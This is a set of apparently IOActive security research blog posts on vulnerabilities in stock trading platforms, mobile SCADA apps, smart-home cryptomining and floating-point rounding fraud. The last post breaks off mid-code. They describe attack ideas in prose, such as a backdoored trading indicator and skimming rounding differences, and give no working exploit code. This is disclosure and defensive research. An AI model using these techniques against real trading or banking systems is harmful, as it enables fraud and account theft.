RESEARCH | August 7, 2018

Are You Trading Stocks Securely? Exposing Security Flaws in Trading Technologies

This blog post contains a small portion of the entire analysis. Please refer to the white paper for full details to the research.

Disclaimer

Most of the testing was performed using paper money (demo accounts) provided online by the brokerage houses. Only a few accounts were funded with real money for testing purposes. In the case of commercial platforms, the free trials provided by the brokers were used. Only end-user applications and their direct servers were analyzed. Other backend protocols and related technologies used in exchanges and financial institutions were not tested.

This research is not about High Frequency Trading (HFT), blockchain, or how to get rich overnight.

Introduction

The days of open outcry on trading floors of the NYSE, NASDAQ, and other stock exchanges around the globe are gone. With the advent of electronic trading platforms and networks, the exchange of financial securities now is easier and faster than ever; but this comes with inherent risks.

stock trading firm

The valuable information as well as the attack surface and vectors in trading environments are slightly different than those in banking systems.

Brokerage houses offer trading platforms to operate in the market. These applications allow you to do things including, but not limited to:

  • Fund your account via bank transfers or credit card
  • Keep track of your available equity and buying power (cash and margin balances)
  • Monitor your positions (securities you own) and their performance (profit)
  • Monitor instruments or indexes
  • Send buy/sell orders
  • Create alerts or triggers to be executed when certain thresholds are reached
  • Receive real-time news or video broadcasts
  • Stay in touch with the trading community through social media and chats

Needless to say, every single item on the previous list must be kept secret and only known by and shown to its owner.

Scope

My analysis started mid-2017 and concluded in July 2018. It encompassed the following platforms; many of them are some of the most used and well-known trading platforms, and some allow cryptocurrency trading:

  • 16 Desktop applications
  • 34 Mobile apps
  • 30 Websites

These platforms are part of the trading solutions provided by the following brokers, which are used by tens of millions of traders. Some brokers offer the three types of platforms, however, in some cases only one or two were reviewed due to certain limitations:

  • Ally Financial
  • AvaTrade
  • Binance
  • Bitfinex
  • Bitso
  • Bittrex
  • Bloomberg
  • Capital One
  • Charles Schwab
  • Coinbase
  • easyMarkets
  • eSignal
  • ETNA
  • eToro
  • E-TRADE
  • ETX Capital
  • ExpertOption
  • Fidelity
  • Firstrade
  • FxPro
  • GBMhomebroker
  • Grupo BMV
  • IC Markets
  • Interactive Brokers
  • IQ Option
  • Kraken
  • com
  • Merrill Edge
  • MetaTrader
  • Net
  • NinjaTrader
  • OANDA
  • Personal Capital
  • Plus500
  • Poloniex
  • Robinhood
  • Scottrade
  • TD Ameritrade
  • TradeStation
  • Yahoo! Finance

Devices used:

  • Windows 7 (64-bit)
  • Windows 10 Home Single (64-bit)
  • iOS 10.3.3 (iPhone 6) [not jailbroken]
  • iOS 10.4 (iPhone 6) [not jailbroken]
  • Android 7.1.1 (Emulator) [rooted]

Basic security controls/features were reviewed that represent just the tip of the iceberg when compared to more exhaustive lists of security checks per platform.

Results

Unfortunately, the results proved to be much worse compared with applications in retail banking. For example, mobile apps for trading are less secure than the personal banking apps reviewed in 2013 and 2015.

Apparently, cybersecurity has not been on the radar of the Financial Services Tech space in charge of developing trading apps. Security researchers have disregarded these technologies as well, probably because of a lack of understanding of money markets.

While testing I noted a basic correlation: the biggest brokers are the ones that invest more in fintech cybersecurity. Their products are more mature in terms of functionality, usability, and security.

Based on my testing results and opinion, the following trading platforms are the most secure:

Broker Platforms
TD Ameritrade Web and mobile
Charles Schwab Web and mobile
Merrill Edge Web and mobile
MetaTrader 4/5 Desktop and mobile
Yahoo! Finance Web and mobile
Robinhood Web and mobile
Bloomberg Mobile
TradeStation Mobile
Capital One Mobile
FxPro cTrader Desktop
IC Markets cTrader Desktop
Ally Financial Web
Personal Capital Web
Bitfinex Web and mobile
Coinbase Web and mobile
Bitso Web and mobile

The medium- to high-risk vulnerabilities found on the different platforms include full or partial problems with encryption, Denial of Service, authentication, and/or session management problems. Despite the fact that these platforms implement good security features, they also have areas that should be addressed to improve their security.

Following the platforms I consider must improve in terms of security:

Broker Platforms
Interactive Brokers Desktop, web and mobile
IQ Option Desktop, web and mobile
AvaTrade Desktop and mobile
E-TRADE Web and mobile
eSignal Desktop
TD Ameritrade’s Thinkorwim Desktop
Charles Schwab Desktop
TradeStation Desktop
NinjaTrader Desktop
Fidelity Web
Firstrade Web
Plus500 Web
Markets.com Mobile

Unencrypted Communications

In 9 desktop applications (64%) and in 2 mobile apps (6%), transmitted data unencrypted was observed. Most applications transmit most of the sensitive data in an encrypted way, however, there were some cases where cleartext data could be seen in unencrypted requests.

Among the data seen unencrypted are passwords, balances, portfolio, personal information and other trading-related data. In most cases of unencrypted transmissions, HTTP in plaintext was seen, and in others, old proprietary protocols or other financial protocols such as FIX were used.

Under certain circumstances, an attacker with access to some part of the network, such as the router in a public WiFi, could see and modify information transmitted to and from the trading application. In the trading context, a malicious actor could intercept and alter values, such as the bid or ask prices of an instrument, and cause a user to buy or sell securities based on misleading information.

For example, the follow application uses unencrypted HTTP. In the screenshot, a buy order:

Another interesting example was found in eSignal’s Data Manager. eSignal is a known signal provider and integrates with a wide variety of trading platforms. It acts as a source of market data. During the testing, it was noted that Data Manager authenticates over an unencrypted protocol on the TCP port 2189, apparently developed in 1999.

As can be seen, the copyright states it was developed in 1999 by Data Broadcasting Corporation. Doing a quick search, we found a document from the SEC that states the company changed its name to Interactive Data Corporation, the owners of eSignal. In other words, it looks like it is an in-house development created almost 20 years ago. We could not corroborate this information, though.

The main eSignal login screen also authenticates through a cleartext channel:

FIX is a protocol initiated in 1992 and is one of the industry standard protocols for messaging and trade execution. Currently, it is used by a majority of exchanges and traders. There are guidelines on how to implement it through a secure channel, however, the binary version in cleartext was mostly seen. Tests against the protocol itself were not performed in this analysis.

A broker that supports FIX:

There are some cases where the application encrypts the communication channel, except in certain features. For instance, Interactive Brokers desktop and mobile applications encrypt all the communication, but not that used by iBot, the robot assistant that receives text or voice commands, which sends the instructions to the server embedded in a FIX protocol message in cleartext:

News related to the positions were also observed in plaintext:

Another instance of an application that uses encryption but not for certain channels is this one, Interactive Brokers for Android, where a diagnostics log with sensitive data is sent to the server in a scheduled basis through unencrypted HTTP:

A similar platform that sends everything over HTTPS is IQ Option, but for some reason, it sends duplicate unencrypted HTTP requests to the server disclosing the session cookie.

Others appear to implement their own binary protocols, such as Charles Schwab, however, symbols in watchlists or quoted symbols could be seen in cleartext:

Interactive Brokers supports encryption but by default uses an insecure channel; an inexperienced user who does not know the meaning of “SSL” (Secure Socket Layer) won’t enable it on the login screen and some sensitive data will be sent and received without encryption:

Passwords Stored Unencrypted

In 7 mobile apps (21%) and in 3 desktop applications (21%), the user’s password was stored unencrypted in a configuration file or sent to log files. Local access to the computer or mobile device is required to extract them, though. This access could be either physical or through malware.

In a hypothetical attack scenario, a malicious user could extract a password from the file system or the logging functionality without any in-depth know-how (it’s relatively easily), log in through the web-based trading platform from the brokerage firm, and perform unauthorized actions. They could sell stocks, transfer the money to a newly added bank account, and delete this bank account after the transfer is complete. During testing, I noticed that most web platforms (+75%) support two-factor authentication (2FA), however, it’s not enabled by default, the user must go to the configuration and enable it to receive authorization codes by text messages or email. Hence, if 2FA is not enabled in the account, it’s possible for an attacker, that knows the password already, to link a new bank account and withdraw the money from sold securities.

The following are some instances where passwords are stored locally unencrypted or sent to logs in cleartext:

Base64 is not encryption:

In some cases, the password was sent to the server as a GET parameter, which is also insecure:

One PIN for login and unlocking the app was also seen:

In IQ Option, the password was stored completely unencrypted:

However, in a newer version, the password is encrypted in a configuration file, but is still stored in cleartext in a different file:

Trading and Account Information Stored Unencrypted

In the trading context, operational or strategic data must not be stored unencrypted nor sent to the any log file in cleartext. This sensitive data encompasses values such as personal data, general balances, cash balance, margin balance, net worth, net liquidity, the number of positions, recently quoted symbols, watchlists, buy/sell orders, alerts, equity, buying power, and deposits. Additionally, sensitive technical values such as username, password, session ID, URLs, and cryptographic tokens should not be exposed either.

8 desktop applications (57%) and 15 mobile apps (44%) sent sensitive data in cleartext to log files or stored it unencrypted. Local access to the computer or mobile device is required to extract this data, though. This access could be either physical or through malware.

If these values are somehow leaked, a malicious user could gain insight into users’ net worth and investing strategy by knowing which instruments users have been looking for recently, as well as their balances, positions, watchlists, buying power, etc.

The following screenshots show applications that store sensitive data unencrypted:

Balances:

Investment portfolio:

Buy/sell orders:

Watchlists:

Recently quoted symbols:

Other data:

Trading Programming Languages with DLL Import Capabilities

This is not a bug, it’s a feature. Some trading platforms allow their customers to create their own automated trading robots (a.k.a. expert advisors), indicators, and other plugins. This is achieved through their own programming languages, which in turn are based on other languages, such as C++, C#, or Pascal.

The following are a few of the trading platforms with their own trading language:

  • MetaTrader: MetaQuotes Language (Based on C++ – Supports DLL imports)
  • NinjaTrader: NinjaScript (Based on C# – Supports DLL imports)
  • TradeStation: EasyLanguage (Based on Pascal – Supports DLL imports)
  • AvaTraceAct: ActFX (Based on Pascal – Does not support OS commands nor DLL imports)
  • (FxPro/IC Markets) cTrader: Based on C# (OS command and DLL support is unknown)

Nevertheless, some platforms such as MetaTrader warn their customers about the dangers related to DLL imports and advise them to only execute plugins from trusted sources. However, there are Internet tutorials claiming, “to make you rich overnight” with certain trading robots they provide. These tutorials also give detailed instructions on how to install them in MetaTrader, including enabling the checkbox to allow DLL imports. Innocent non-tech savvy traders are likely to enable such controls, since not everyone knows what a DLL file is or what is being imported from it. Dangerous.

Following a malicious Ichimoku indicator that, when loaded into any chart, downloads and executes a backdoor for remote access:

Another basic example is NinjaTrader, which simply allows OS commands through C#’s System.Diagnostics.Process.Start(). In the following screenshot, calc.exe executed from the chart initialization routine:

Denial of Service

Many desktop platforms integrate with other trading software through common TCP/IP sockets. Nevertheless, some common weaknesses are present in the connections handling of such services.

A common error is not implementing a limit of the number of concurrent connections. If there is no limit of concurrent connections on a TCP daemon, applications are susceptible to denial-of-service (DoS) or other type of attacks depending on the nature of the applications.

For example, TD Ameritrade’s Thinkorswim TCP-Orders Server listens on the TCP port 2000 in the localhost interface, and there is no limit for connections nor a waiting time between orders. This leads to the following problems:

  • Memory leakage since, apparently, the resources assigned to every connection are not freed upon termination.
  • Continuous order pop-ups (one pop-up per order received through the TCP server) render the application useless.
  • A NULL pointer dereference is triggered and an error report (.zip file) is created.

Regardless, it listens on the local interface only. There are different ways to reach this port, such as XMLHttpRequest() in JavaScript through a web browser.

Memory leakage could be easily triggered by creating as many connections as possible:

A similar DoS vulnerability due to memory exhaustion was found in eSignal’s Data Manager. eSignal is a known signal provider and integrates with a wide variety of trading platforms. It acts as a source of market data; therefore, availability is the most important asset:

It’s recommended to implement a configuration item to allow the user to control the behavior of the TCP order server, such as controlling the maximum number of orders sent per minute as well as the number of seconds to wait between orders to avoid bottlenecks.

The following capture from Interactive Brokers shows when this countermeasure is implemented properly. No more than 51 users can be connected simultaneously:

Session Still Valid After Logout

Normally, when the logout button is pressed in an app, the session is finished on both sides: server and client. Usually the server deletes the session token from its valid session list and sends a new empty or random value back to the client to clear or overwrite the session token, so the client needs to reauthenticate next time.

In some web platforms such as E-TRADE, Charles Schwab, Fidelity and Yahoo! Finance (Fixed), the session was still valid one hour after clicking the logout button:

Authentication

While most web-based trading platforms support 2FA (+75%), most desktop applications do not implement it to authenticate their users, even when the web-based platform from the same broker supports it.

Nowadays, most modern smartphones support fingerprint-reading, and most trading apps use it to authenticate their customers. Only 8 apps (24%) do not implement this feature.

Unfortunately, using the fingerprint database in the phone has a downside:

Weak Password Policies

Some institutions let the users choose easily guessable passwords. For example:

The lack of a secure password policy increases the chances that a brute-force attack will succeed in compromising user accounts.

In some cases, such as in IQ Option and Markets.com, the password policy validation is implemented on the client-side only, hence, it is possible to intercept a request and send a weak password to the server:

Automatic Logout/Lockout for Idle Sessions

Most web-based platforms logout/lockout the user automatically, but this is not the case for desktop (43%) and mobile apps (25%). This is a security control that forces the user to authenticate again after a period of idle time.

Privacy Mode

This mode protects the customers’ private information from being displayed on the screen in public areas where shoulder-surfing attacks are feasible. Most of the mobile apps, desktop applications, and web platforms do not implement this useful and important feature.

The following images show before and after enabling privacy mode in Thinkorswim for mobile:

Hardcoded Secrets in Code and App Obfuscation

16 Android .apk installers (47%) were easily reverse engineered to human-readable code since they lack of obfuscation. Most Java and .NET-based desktop applications were also reverse-engineered easily. The rest of the applications had medium to high levels of obfuscation, such as Merrill Edge in the next screenshot.

The goal of obfuscation is to conceal the applications purpose (security through obscurity) and logic in order to deter reverse engineering and to make it more difficult.

In the non-obfuscated platforms, there are hardcoded secrets such as cryptographic keys and third-party service partner passwords. This information could allow unauthorized access to other systems that are not under the control of the brokerage houses. For example, a Morningstar.com account (investment research) hardcoded in a Java class:

Interestingly, 14 of the mobile apps (41%) and 4 of the desktop platforms (29%) have traces (hostnames and IPs) about the internal development and testing environments where they were made or tested. Some hostnames are reachable from the Internet and since they’re testing systems they could lack of proper protections.

SSL Certificate Validation

11 of the reviewed mobile apps (32%) do not check the authenticity of the remote endpoint by verifying its SSL certificate; therefore, it’s feasible to perform Man-in-the-Middle (MiTM) attacks to eavesdrop on and tamper with data. Some MiTM attacks require to trick the user into installing a malicious certificate on their phones, though.

The ones that verify the certificate normally do not transmit any data, however, only Charles Schwab allows the user to use the app with the provided certificate:

Lack of Anti-exploitation Mitigations

ASLR randomizes the virtual address space locations of dynamically loaded libraries. DEP disallows the execution of data in the data segment. Stack Canaries are used to identify if the stack has been corrupted. These security features make much more difficult for memory corruption bugs to be exploited and execute arbitrary code.

The majority of the desktop applications do not have these security features enabled in their final releases. In some cases, that these features are only enabled in some components, not the entire application. In other cases, components that handle network connections also lack these flags.

Linux applications have similar protections. IQ Option for Linux does not enforce all of them on certain binaries.

Other Weaknesses

More issues were found in the platforms. For more details, please refer to the white paper. 

Statistics

Since a picture is worth a thousand words, consider the following graphs:

For more statistics, please refer to the white paper.

Responsible Disclosure

One of IOActive’s missions is to act responsibly when it comes to vulnerability disclosure. In September 2017 we sent a detailed report to 13 of the brokerage firms whose mobile trading apps presented some of the higher risks vulnerabilities discussed in this paper. More recently, between May and July 2018, we sent additional vulnerability reports to brokerage firms.

As of July 27, 2018, 19 brokers that have medium- or high-risk vulnerabilities in any of their platforms were contacted.

TD Ameritrade and Charles Schwab were the brokers that communicated more with IOActive for resolving the reported issues.

For a table with the current status of the responsible disclosure process, please refer to the white paper.

Conclusions and Recommendations

  • Trading platforms are less secure than the applications seen in retail banking.
  • There’s still a long way to go to improve the maturity level of security in trading technologies.
  • End users should enable all the security mechanisms their platforms offer, such as 2FA and/or biometric authentication and automatic lockout/logout. Also, it’s recommended not to trade while connected to public networks and not to use the same password for other financial services.
  • Brokerage firms should perform regular internal audits to continuously improve the security of their trading platforms.
  • Brokerage firms should also offer security guidance in their online education centers.
  • Developers should analyze their current applications to determine if they suffer from the vulnerabilities described in this paper, and if so, fix them.
  • Developers should design new, more secure financial software following secure coding practices.
  • Regulators should encourage brokers to implement safeguards for a better trading environment. They could also create trading-specific guidelines to be followed by the brokerage firms and FinTech companies in charge of creating trading software.
  • Rating organizations should include security in their reviews.

Side Note

Remember: the stock market is not a casino where you magically get rich overnight. If you lack an understanding of how stocks or other financial instruments work, there is a high risk of losing money quickly. You must understand the market and its purpose before investing.

With nothing left to say, I wish you happy and secure trading!

Thanks for reading,

Alejandro
@nitr0usmx

This blog post contains a small portion of the entire analysis.
Please refer to the white paper.

EDITORIAL | January 24, 2018

Cryptocurrency and the Interconnected Home

There are many tiny elements to cryptocurrency that are not getting the awareness time they deserve. To start, the very thing that attracts people to cryptocurrency is also the very thing that is seemingly overlooked as a challenge. Cryptocurrencies are not backed by governments or institutions. The transactions allow the trader or investor to operate with anonymity. We have seen a massive increase in the last year of cyber bad guys hiding behind these inconspicuous transactions – ransomware demanding payment in bitcoin; bitcoin ATMs being used by various dealers to effectively clean money.

Because there are few regulations governing crypto trading, we cannot see if cryptocurrency is being used to fund criminal or terrorist activity. There is an ancient funds transfer capability, designed to avoid banks and ledgers called Hawala. Hawala is believed to be the method by which terrorists are able to move money, anonymously, across borders with no governmental controls. Sound like what’s happening with cryptocurrency? There’s an old saying in law enforcement – follow the money. Good luck with that one.

Many people don’t realize that cryptocurrencies depend on multiple miners. This allows the processing to be spread out and decentralized. Miners validate the integrity of the transactions and as a result, the miners receive a “block reward” for their efforts. But, these rewards are cut in half every 210,000 blocks. A bitcoin block reward when it first started in 2009 was 50 BTC, today it’s 12.5. There are about 1.5 million bitcoins left to mine before the reward halves again.

This limit on total bitcoins leads to an interesting issue – as the reward decreases, miners will switch their attention from bitcoin to other cryptocurrencies. This will reduce the number of miners, therefore making the network more centralized. This centralization creates greater opportunity for cyber bad guys to “hack” the network and wreak havoc, or for the remaining miners to monopolize the mining.

At some point, and we are already seeing the early stages of this, governments and banks will demand to implement more control. They will start to produce their own cryptocurrency. Would you trust these cryptos? What if your bank offered loans in Bitcoin, Ripple or Monero? Would you accept and use this type of loan?

Because it’s a limited resource, what happens when we reach the 21 million bitcoin limit? Unless we change the protocols, this event is estimated to happen by 2140.  My first response  – I don’t think bitcoins will be at the top of my concerns list in 2140.

The Interconnected Home

So what does crypto-mining malware or mineware have to do with your home? It’s easy enough to notice if your laptop is being overused – the device slows down, the battery runs down quickly. How can you tell if your fridge or toaster are compromised? With your smart home now interconnected, what happens if the cyber bad guys operate there? All a cyber bad guy needs is electricity, internet and CPU time. Soon your fridge will charge your toaster a bitcoin for bread and butter. How do we protect our unmonitored devices from this mineware? Who is responsible for ensuring the right level of security on your home devices to prevent this?

Smart home vulnerabilities present a real and present danger. We have already seen baby monitors, robots, and home security products, to name a few, all compromised. Most by IOActive researchers. There can be many risks that these compromises introduce to the home, not just around cryptocurrency. Think about how the interconnected home operates. Any device that’s SMART now has the three key ingredients to provide the cyber bad guy with everything he needs – internet access, power and processing.

Firstly, I can introduce my mineware via a compromised mobile phone and start to exploit the processing power of your home devices to mine bitcoin. How would you detect this? When could you detect this? At the end of the month when you get an electricity bill. Instead of 50 pounds a month, its now 150 pounds. But how do you diagnose the issue? You complain to the power company. They show you the usage. It’s correct. Your home IS consuming that power.

They say that crypto mining is now using as much power as a small country. That’s got a serious impact on the power infrastructure as well as the environment. Ahhhh you say, I have a smart meter, it can give me a real time read out of my usage. Yes, it’s a computer. And, if I’m a cyber bad guy, I can make that computer tell me the latest football scores if I want. The key for a corporation when a cyber bad guy is attacking is to reduce dwell time. Detect and stop the bad guy from playing in your network. There are enterprise tools that can perform these tasks, but do you have these same tools at home? How would you Detect and React to a cyber bad guy attacking your smart home?

IOActive has proven these attack vectors over and over. We know this is possible and we know this is almost impossible to detect. Remember, a cyber bad guy makes several assessments when deciding on an attack – the risk of detection, the reward for the effort, and the penalty for capture. The risk of detection is low, like very low. The reward, well you could be mining blocks for months without stopping, that’s tens of thousands of dollars. And the penalty… what’s the penalty for someone hacking your toaster… The impact is measurable to the homeowner. This is real, and who’s to say not happening already. Ask your fridge!!

What’s the Answer –  Avoid Using Smart Home Devices Altogether?

No, we don’t believe the best defense is to avoid adopting this new technology. The smart and interconnected home can offer its users fantastic opportunities. We believe that the responsibility rests with the manufacturer to ensure that devices are designed and built in a safe and secure way. And, yes, everything is designed; few things are designed well.IOActive researchers spend 99% of their time trying to identify vulnerabilities in these devices for the safety of everyone, not just corporations. The power is in the hands of the consumer. As soon as the consumer starts to purchase products based not only on their power efficiency, but their security rating as well, then we will see a shift into a more secure home.

In the meantime, consider the entry point for most cyber bad guys. Generally, this is your desktop, laptop or mobile device. Therefore, ensure you have suitable security products running on these devices, make sure they are patched to the correct levels, be conscious of the websites you are visiting. If you control the available entry points, you will go a long way to protecting your home.
RESEARCH | January 11, 2018

SCADA and Mobile Security in the IoT Era

Two years ago, we assessed 20 mobile applications that worked with ICS software and hardware. At that time, mobile technologies were widespread, but Internet of Things (IoT) mania was only starting. Our research concluded the combination of SCADA systems and mobile applications had the potential to be a very dangerous and vulnerable cocktail. In the introduction of our paper, we stated “convenience often wins over security. Nowadays, you can monitor (or even control!) your ICS from a brand-new Android [device].”


Today, no one is surprised at the appearance of an IIoT. The idea of putting your logging, monitoring, and even supervisory/control functions in the cloud does not sound as crazy as it did several years ago. If you look at mobile application offerings today, many more ICS- related applications are available than two years ago. Previously, we predicted that the “rapidly growing mobile development environment” would redeem the past sins of SCADA systems.
The purpose of our research is to understand how the landscape has evolved and assess the security posture of SCADA systems and mobile applications in this new IIoT era.

SCADA and Mobile Applications
ICS infrastructures are heterogeneous by nature. They include several layers, each of which is dedicated to specific tasks. Figure 1 illustrates a typical ICS structure.

Figure 1: Modern ICS infrastructure including mobile apps

Mobile applications reside in several ICS segments and can be grouped into two general families: Local (control room) and Remote.


Local Applications

Local applications are installed on devices that connect directly to ICS devices in the field or process layers (over Wi-Fi, Bluetooth, or serial).

Remote Applications
Remote applications allow engineers to connect to ICS servers using remote channels, like the Internet, VPN-over-Internet, and private cell networks. Typically, they only allow monitoring of the industrial process; however, several applications allow the user to control/supervise the process. Applications of this type include remote SCADA clients, MES clients, and remote alert applications. 

In comparison to local applications belonging to the control room group, which usually operate in an isolated environment, remote applications are often installed on smartphones that use Internet connections or even on personal devices in organizations that have a BYOD policy. In other words, remote applications are more exposed and face different threats.

Typical Threats And     Attacks

In this section, we discuss the typical threats to this heterogeneous landscape of applications and how attacks could be conducted. We also map the threats to the application types.
 
Threat Types
There are three main possible ICS threat types:
  • Unauthorized physical access to the device or “virtual” access to device data
  • Communication channel compromise (MiTM)
  • Application compromise

Table 1 summarizes the threat types.

Table 1: SCADA mobile client threat list
 
Attack Types
Based on the threats listed above, attacks targeting mobile SCADA applications can be sorted into two groups.
 
Directly/indirectly influencing an industrial process or industrial network infrastructure
This type of attack could be carried out by sending data that would be carried over to the field segment devices. Various methods could be used to achieve this, including bypassing ACL/ permissions checks, accessing credentials with the required privileges, or bypassing data validation.
 
Compromising a SCADA operator to unwillingly perform a harmful action on the system
The core idea is for the attacker to create environmental circumstances where a SCADA system operator could make incorrect decisions and trigger alarms or otherwise bring the system into a halt state.
 
Testing Approach
Similar to the research we conducted two years ago, our analysis and testing approach was based on the OWASP Mobile Top 10 2016. Each application was tested using the following steps:
  • Perform analysis and fill out the test checklist
  • Perform client and backend fuzzing
  • If needed, perform deep analysis with reverse engineering
We did not alter the fuzzing approach since the last iteration of this research. It was discussed in depth in our previous whitepaper, so its description is omitted for brevity.
We improved our test checklist for this assessment. It includes:
  • Application purpose, type, category, and basic information 
  • Permissions
  • Password protection
  • Application intents, exported providers, broadcast services, etc.
  • Native code
  • Code obfuscation
  • Presence of web-based components
  • Methods of authentication used to communicate with the backend
  • Correctness of operations with sessions, cookies, and tokens 
  • SSL/TLS connection configuration
  • XML parser configuration
  • Backend APIs
  • Sensitive data handling
  • HMI project data handling
  • Secure storage
  • Other issues
Reviewed Vendors
We analyzed 34 vendors in our research, randomly selecting  SCADA application samples from the Google Play Store. We did, however, favor applications for which we were granted access to the backend hardware or software, so that a wider attack surface could be tested.
 
Additionally, we excluded applications whose most recent update was before June 2015, since they were likely the subject of our previous work. We only retested them if there had been an update during the subsequent two years.
 
Findings
We identified 147 security issues in the applications and their backends. We classified each issue according to the OWASP Top Ten Mobile risks and added one additional category for backend software bugs.
 
Table 4 presents the distribution of findings across categories. The “Number of Issues” column reports the number of issues belonging to each category, while the “% of Apps” column reports how many applications have at least one vulnerability belonging to each category.
Table 4. Vulnerabilities statistics

In our white paperwe provide an in-depth analysis of each category, along with examples of the most significant vulnerabilities we identified. Please download the white paper for a deeper analysis of each of the OWASP category findings.

Remediation And Best Practices
In addition to the well-known recommendations covering the OWASP Top 10 and OWASP Mobile Top 10 2016 risks, there are several actions that could be taken by developers of mobile SCADA clients to further protect their applications and systems.

In the following list, we gathered the most important items to consider when developing a mobile SCADA application:

  • Always keep in mind that your application is a gateway to your ICS systems. This should influence all of your design decisions, including how you handle the inputs you will accept from the application and, more generally, anything that you will accept and send to your ICS system.
  • Avoid all situations that could leave the SCADA operators in the dark or provide them with misleading information, from silent application crashes to full subverting of HMI projects.
  • Follow best practices. Consider covering the OWASP Top 10, OWASP Mobile Top 10 2016, and the 24 Deadly Sins of Software Security.
  • Do not forget to implement unit and functional tests for your application and the backend servers, to cover at a minimum the basic security features, such as authentication and authorization requirements.
  • Enforce password/PIN validation to protect against threats U1-3. In addition, avoid storing any credentials on the device using unsafe mechanisms (such as in cleartext) and leverage robust and safe storing mechanisms already provided by the Android platform.
  • Do not store any sensitive data on SD cards or similar partitions without ACLs at all costs Such storage mediums cannot protect your sensitive data.
  • Provide secrecy and integrity for all HMI project data. This can be achieved by using authenticated encryption and storing the encryption credentials in the secure Android storage, or by deriving the key securely, via a key derivation function (KDF), from the application password.
  • Encrypt all communication using strong protocols, such as TLS 1.2 with elliptic curves key exchange and signatures and AEAD encryption schemes. Follow best practices, and keep updating your application as best practices evolve. Attacks always get better, and so should your application.
  • Catch and handle exceptions carefully. If an error cannot be recovered, ensure the application notifies the user and quits gracefully. When logging exceptions, ensure no sensitive information is leaked to log files.
  • If you are using Web Components in the application, think about preventing client-side injections (e.g., encrypt all communications, validate user input, etc.).
  • Limit the permissions your application requires to the strict minimum.
  • Implement obfuscation and anti-tampering protections in your application.

Conclusions
Two years have passed since our previous research, and things have continued to evolve. Unfortunately, they have not evolved with robust security in mind, and the landscape is less secure than ever before. In 2015 we found a total of 50 issues in the 20 applications we analyzed and in 2017 we found a staggering 147 issues in the 34 applications we selected. This represents an average increase of 1.6 vulnerabilities per application. 

We therefore conclude that the growth of IoT in the era of “everything is connected” has not led to improved security for mobile SCADA applications. According to our results, more than 20% of the discovered issues allow attackers to directly misinform operators and/or directly/ indirectly influence the industrial process.

In 2015, we wrote:

SCADA and ICS come to the mobile world recently, but bring old approaches and weaknesses. Hopefully, due to the rapidly developing nature of mobile software, all these problems will soon be gone.

We now concede that we were too optimistic and acknowledge that our previous statement was wrong.

Over the past few years, the number of incidents in SCADA systems has increased and the systems become more interesting for attackers every year. Furthermore, widespread implementation of the IoT/IIoT connects more and more mobile devices to ICS networks.

Thus, the industry should start to pay attention to the security posture of its SCADA mobile applications, before it is too late.

For the complete analysis, please download our white paper here.

Acknowledgments

Many thanks to Dmitriy Evdokimov, Gabriel Gonzalez, Pau Oliva, Alfredo Pironti, Ruben Santamarta, and Tao Sauvage for their help during our work on this research.
 
About Us
Alexander Bolshev
Alexander Bolshev is a Security Consultant for IOActive. He holds a Ph.D. in computer security and works as an assistant professor at Saint-Petersburg State Electrotechnical University. His research interests lie in distributed systems, as well as mobile, hardware, and industrial protocol security. He is the author of several white papers on topics of heuristic intrusion detection methods, Server Side Request Forgery attacks, OLAP systems, and ICS security. He is a frequent presenter at security conferences around the world, including Black Hat USA/EU/UK, ZeroNights, t2.fi, CONFIdence, and S4.
 
Ivan Yushkevich
Ivan is the information security auditor at Embedi (http://embedi.com). His main area of interest is source code analysis for applications ranging from simple websites to enterprise software. He has vast experience in banking systems and web application penetration testing.
 
IOActive
IOActive is a comprehensive, high-end information security services firm with a long and established pedigree in delivering elite security services to its customers. Our world-renowned consulting and research teams deliver a portfolio of specialist security services ranging from penetration testing and application code assessment through to semiconductor reverse engineering. Global 500 companies across every industry continue to trust IOActive with their most critical and sensitive security issues. Founded in 1998, IOActive is headquartered in Seattle, USA, with global operations through the Americas, EMEA and Asia Pac regions. Visit for more information. Read the IOActive Labs Research Blog. Follow IOActive on Twitter.
 
Embedi
Embedi expertise is backed up by extensive experience in security of embedded devices, with special emphasis on attack and exploit prevention. Years of research are the genesis of the software solutions created. Embedi developed a wide range of security products for various types of embedded/smart devices used in different fields of life and industry such as: wearables, smart home, retail environments, automotive, smart buildings, ICS, smart cities, and others. Embedi is headquartered in Berkeley, USA. Visit for more information and follow Embedi on Twitter.
RESEARCH | December 17, 2015

(In)secure iOS Mobile Banking Apps – 2015 Edition

Two years ago, I decided to conduct research in order to obtain a global view of the state of security of mobile banking apps from some important banks. In this blog post, I will present my latest results to show how the security of the same mobile banking apps has evolved.

(more…)

INSIGHTS | August 25, 2015

Money may grow on trees

Sometimes when buying something that costs $0.99 USD (99 cents) or $1.01 USD (one dollar and one cent), you may pay an even dollar. Either you or the cashier may not care about the remaining penny, and so one of you takes a small loss or profit.

 

Rounding at the cash register is a common practice, just as it is in programming languages when dealing with very small or very large numbers. I will describe here how an attacker can make a profit when dealing with the rounding mechanisms of programming languages.
 
Lack of precision in numbers

IEEE 754 standard has defined floating point numbers for more than 30 years. The requirements that guided the formulation of the standard for binary floating-point arithmetic provided for the development of very high-precision arithmetic.

 

The standard defines how operations with floating point numbers should be performed, and also defines standard behavior for abnormal operations. It identifies five possible types of floating point exceptions: invalid operation (highest priority), division by zero, overflow, underflow, and inexact (lowest priority).

 

We will explore what happens when inexact floating point exceptions are triggered. The rounded result of a valid operation can be different from the real (and sometimes infinitely precise) result and certain operations may go unnoticed.
 
Rounding
Rounding takes an exact number and, if necessary, modifies it to fit in the destination’s format. Normally, programming languages do not alert for the inexact exception and instead just deliver the rounded value. Nevertheless, documentation for programming languages contains some warnings about this:

 

To exemplify this matter, this is how the number 0.1 looks internally in Python:

 

The decimal value 0.1 cannot be represented precisely when using binary notation, since it is an infinite number in base 2. Python will round the previous number to 0.1 before showing the value.
 
Salami slicing the decimals

Salami slicing refers to a series of small actions that will produce a result that would be impossible to perform all at once. In this case, we will grab the smallest amount of decimals that are being ignored by the programming language and use that for profit.

 

Let’s start to grab some decimals in a way that goes unnoticed by the programming language. Certain calculations will trigger more obvious differences using certain specific values. For example, notice what happens when using v8 (Google’s open source JavaScript engine) to add the values 0.1 plus 0.2:

 

Perhaps we could take some of those decimals without JavaScript noticing:

 

 

 

But what happens if we are greedy? How much can we take without JavaScript noticing?

 
 
That’s interesting; we learned that it is even possible to take more than what was shown, but no more than 0.00000000000000008 from that operation before JavaScript notices.
I created a sample bank application to explain this, pennies.js:
 
// This is used to wire money
function wire(deposit, money, withdraw) {
  account[deposit] += money;
  account[withdraw] -= money;
  if(account[withdraw]<0)
    return 1; // Error! The account can not have a negative balance
  return 0;
}
 
// This is used to print the balance
function print_balance(time) {
  print(“——————————————–“);
